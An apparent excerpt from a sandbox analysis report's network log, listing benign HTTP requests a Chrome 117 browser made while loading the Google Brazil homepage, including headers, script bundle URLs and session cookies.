Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=1/ed=1/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=1/ed=1/dg=2/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DULqB:RKfG5c;Dkk6ge:wJqrrd;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;Erl4fe:FloWmf,FloWmf;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IZrNqe:P8ha2c;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;Oj465e:KG2eXe,KG2eXe;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:VruDBd;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;io8t5d:sgY6Zb;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sP4Vbe:VwDzFe;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uY49fb:COQbmf;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-fu
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=J9-GZvKjJq-Jxc8Pk7aqmA0.1720114985301&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=10/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/ck=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=1/exm=SNUn3,cEt90b,cdos,csi,d,dtl0hd,eHDfl,hsm,jsa,mb4ZUb,qddgKe,sTsDMc/ed=1/dg=0/br=1/ujg=1/rs=ACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DULqB:RKfG5c;Dkk6ge:wJqrrd;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;Erl4fe:FloWmf;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IZrNqe:P8ha2c;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;Oj465e:KG2eXe;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO;SNUn3:ZwDk9d,x8cHvb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:VruDBd;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;io8t5d:sgY6Zb;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sP4Vbe:VwDzFe;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uY49fb:COQbmf;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=B2qlPe,DhPYme,MpJwZc,NzU6V,UUJqVe,Wo3n8,aa,abd,async,epYOx,ifl,ms4mZb,pHXghd,q0xTif,s39S4,sOXFj,sb_wiz,sf,sonic,spch,zGLm3b?xjs=s1 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chr
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en HTTP/1.1Host: ogs.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=J9-GZvKjJq-Jxc8Pk7aqmA0.1720114985301&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /client_204?atyp=i&biw=1034&bih=870&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449 HTTP/1.1Host: www.google.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.iZZZ0XsR8bM.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAQ/rs=AHpOoo_0-97nH_2IxP0suYF105-PdJv4zg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
